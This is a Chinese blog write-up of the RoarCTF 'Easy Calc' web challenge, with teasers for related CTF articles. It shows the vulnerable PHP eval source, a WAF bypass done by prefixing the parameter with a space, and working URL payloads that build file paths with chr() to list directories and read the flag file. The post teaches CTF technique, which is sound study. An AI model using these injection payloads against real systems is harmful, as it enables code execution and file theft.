RoarCTF-Easycalc

最新推荐文章于 2022-04-17 21:23:21 发布
最新推荐文章于 2022-04-17 21:23:21 发布
阅读量193 收藏 1
点赞数 1
分类专栏: CTF训练日记 文章标签: php 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/unexpectedthing/article/details/120414869
版权

文章目录

前言

利用点:绕过waf,编码构造命令,读取代码。

常规解法

首先F12发现js代码,并猜测可能存在waf
在这里插入图片描述
抓包存在calc.php
在这里插入图片描述
得到源码

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

发现正则表达式验证,preg_match,一旦匹配正则表达式,就会返回1,没有匹配,返回0。
但是,正则表达式过滤了,比较重要的`,"",’’,$,^三个符号

绕过点:
首先绕过waf:

  • 在num前添加%20(空格)绕过对num的检测
  • HTTP走私之重复Content-Length绕过(下面会介绍)

为什么可以用num前加空格绕过?
在前端GET传参的时候,%20num和num两个参数是不一样的,所以waf绕过,到后端,自动处理了空格,php就可以接受到。

试了一下phpinfo(),禁用了一堆函数
在这里插入图片描述
然后我们使用scandir()函数和chr()函数,来绕过代码执行。
chr(),Ascii码转换为字符串

scandir():列出指定路径中的文件和目录
scandir(string $directory, int $sorting_order = ?, resource $context = ?): array
参数:
directory
要被浏览的目录

sorting_order
默认的排序顺序是按字母升序排列。如果使用了可选参数 sorting_order(设为 1),
则排序顺序是按字母降序排列。

返回值:
成功则返回包含有文件名的 array,如果失败则返回 false。如果 directory 不是个目录,则返回布尔值 false 并生成一条 E_WARNING 级的错误

scandir()

/calc.php?%20num=var_dump(scandir(chr(47)))

还可以用glob()

/calc.php?%20num=var_dump(glob(chr(47).chr(42)))

glob(): 寻找与模式匹配的文件路径

glob(string $pattern, int $flags = 0): array

参数
pattern:匹配模式(pattern)。 不进行缩写扩展或参数替代。
特殊字符:

* - 匹配零个或多个字符。
? - 只匹配单个字符(任意字符)。
[...] - 匹配一组字符中的一个字符。 如果第一个字符是 !,则为否定模式, 即匹配不在这组字符中的任意字符。
\ - 只要没有使用 GLOB_NOESCAPE 标记,该字符会转义后面的字符。
flags
有效标记有:

GLOB_MARK - 在每个返回的项目中加一个斜线
GLOB_NOSORT - 按照文件在目录中出现的原始顺序返回(不排序)
GLOB_NOCHECK - 如果没有文件匹配则返回用于搜索的模式
GLOB_NOESCAPE - 反斜线不转义元字符
GLOB_BRACE - 扩充 {a,b,c} 来匹配 'a','b' 或 'c'
GLOB_ONLYDIR - 仅返回与模式匹配的目录项
GLOB_ERR - 停止并读取错误信息(比如说不可读的目录),默认的情况下忽略所有错误
返回值
返回包含有匹配文件和目录的数组,没有匹配文件时返回空数组,出错返回 false。

找到flag路径,现在需要读取文件。
在这里插入图片描述
读取文件操作

/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

/calc.php?%20num=show_source(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

/calc.php?%20num=print_r(php_strip_whitespace(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

/calc.php?%20num=readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

/calc.php?%20num=var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

/calc.php?%20num=include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

http走私攻击

解法:
在这里插入图片描述
参考文章:
https://xz.aliyun.com/t/6654#toc-

Z3eyOnd
关注
专栏目录
RoarCTF2019部分Writeup
Sea_Sand息禅
11-29 864
Easy Calc 页面源码线索中得到calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"'...
[RoarCTF2019]babyRSA----------威尔逊定理
weixin_44110537的博客
07-11 998
加密脚本 import sympy import random def myGetPrime(): A= getPrime(513) print(A) B=A-random.randint(1e3,1e5) print(B) return sympy.nextPrime((B!)%A) p=myGetPrime() #A1=218569634524616304373482784341914340000660767504190274938524635134698652
BUUCTF之[RoarCTF 2019]Easy Calc
qq_43147309的博客
07-17 465
1.题 2.题样 3.测试,数字,字母: 字母都不能计算: 查看源码,说有WAF,看到提示有一个calc.php文件,访问试试: ![](https://img-blog.csdnimg.cn/20200717120212511.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMTQ3MzA5,size_16,color_FFFF
[RoarCTF 2019]Easy Calc
m0_62092622的博客
03-12 605
打开是一个计算器 输入会出现结果。 看名字有clac,我还查了一下calc函数 calc() 函数用于动态计算长度值。 需要注意的是,运算符前后都需要保留一个空格,例如:width: calc(100% - 10px); 任何长度值都可以使用calc()函数进行计算; calc()函数支持 "+", "-", "*", "/" 运算; calc()函数使用标准的数学运算优先级规则; 不过对写题没什么帮助,就当课外知识吧 查看源码发现提示 WAF是什么呢,查阅资料: W
【BUUCTF】Web题目 WriteUp
Luminous_song的博客
03-12 5857
Web类题目
BUUCTF:[RoarCTF 2019]Easy Calc
末初的CSDN博客
10-19 1234
题目地址:https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc 查看源码 抓包发现calc.php 访问http://node3.buuoj.cn:28908/calc.php 很明显,代码执行绕过,前面源码也说了有WAF,这里绕过WAF有两种方法 在num前添加%20绕过对num的检测 HTTP走私之重复Content-Length绕过 首先看下phpinfo(),禁用了一大堆函数 使用scandir()函数+chr()函数绕过.
2021年鹤城杯
unexpectedthing的博客
04-17 2519
[鹤城杯 2021]EasyP 考点 php特性 wp 代码 <?php include 'utils.php'; if (isset($_POST['guess'])) { $guess = (string) $_POST['guess']; if ($guess === $secret) { $message = 'Congratulations! The flag is: ' . $flag; } else { $message = 'W
BUU-RSA [RoarCTF2019]babyRSA(威尔逊定理)
晓寒的博客
07-21 2919
[RoarCTF2019]babyRSA(威尔逊定理) 题目 import sympy import random def myGetPrime(): A= getPrime(513) print(A) B=A-random.randint(1e3,1e5) print(B) return sympy.nextPrime((B!)%A) p=myGetPrime() #A1=2185696345246163043734827843419143400006607675
[RoarCTF 2019]Easy Java -wp
freerats的博客
07-01 231
打开容器后发现一个登入框,这里是可以登入的,存在弱口令admin,admin888 但是登入没什么用 点开help 看到了熟悉的filename参数 试了一下直接get传没什么用,换POST传输 这个下载下来没什么用 结合java,看一下WEB-INF/web.xml 传filename=WEB-INF/web.xml 打开发现下面有一个FlagController 路径为:com.wm.ctf.FlagController 接下来下载class文件进行反编译即可 payload:filename=W
CTF逆向-[RoarCTF2019]polyre-WP_控制流扁平化去混淆idcpy去指令
serfend's blog
03-24 4500
CTF逆向-[RoarCTF2019]polyre-WP_控制流扁平化去混淆idcpy去指令 来源:BUUCTF在线评测/ 内容:无 附件:百度网盘 请输入提取码 提取码:nyty 答案:flag{6ff29390-6c20-4c56-ba70-a95758e3d1f8} 总体思路 使用deflat.py对程序扁平化处理。 使用ida的python idc工具对多余指令去除。 检查算法发现是crc64,按其流程逆运算 详细步骤 检查文件信息 打开程序发现控..
BUUCTF WEB [RoarCTF 2019]Easy Calc
A_dmin的博客
12-13 5012
BUUCTF WEB [RoarCTF 2019]Easy Calc 打开网页是一个计算的!!随便输入可以计算,然后就没啥了,右键源代码: 存在waf,,还有个新的页面!进行访问,看到源代码: <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ ...
HTTP请求走私漏洞
Atkx's Blog
04-11 5459
这里写自定义目录标题 [RoarCTF 2019]Easy Calc calc.php代码 <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $str = $_GET['num']; $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 7万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
BUU CTF web(三)
0xdawn的博客
04-30 7530
[WesternCTF2018]shrine import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shr...
[RoarCTF 2019]Easy Calc 1 -- 小白学习之旅
生死看淡,不服就干的博客
03-16 322
进入靶机后,发现是个简单的计算器 有输入框就得各种试啊,作为一个测试人员应该有的自觉 经测试发现,字母不能被解析,还有一些其他特殊字符。常规操作,F12 查看网页源码 这里发现点有意思的东西,博主最初以为是 encodeURIComponent() ,然后了解了一下 JavaScript encodeURIComponent() 函数 摘录: 该方法不会对 ASCII 字母和数字进行编码,也不会对这些 ASCII 标点符号进行编码: - _ . ! ~ * ’ ( ) 。 其他字符(比如..
关于PHP代码审计的一些题目
Animation77的博客
09-07 1871
题目一: <?php ////phpinfo(); error_reporting(0); show_source(__file__); preg_replace($_GET["a"], $_GET["b"], $_GET["c"]); ?> 解题思路:先看preg_replace函数定义 这里用到了一个小技巧,用到 /e(有些php版本不支持,我这里是可以的), 这...
RoarCTFweb题解
st0ut的博客
10-21 1810
前言 参加了RoarCTF,题目质量挺好的,学到了一些东西。在这里复现记录一下。 easy_calc 打开题目发现是一个计算器的功能,感觉计算器已经出过好多次了。查看源代码,发现了calc.php <?php error_reporting(0); if(!isset($_GET['num'])){ show_source(__FILE__); }else{ $st...
[roarctf 2019]easy calc
最新发布
03-16
这道题是一道简单的逆向工程题目,给出了一个计算器程序和加密后的标志,需要我们破解加密算法并计算出正确的标志。 我们可以使用反编译工具对程序进行反编译,然后找到加密算法的相关代码。在这个程序中,加密算法...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值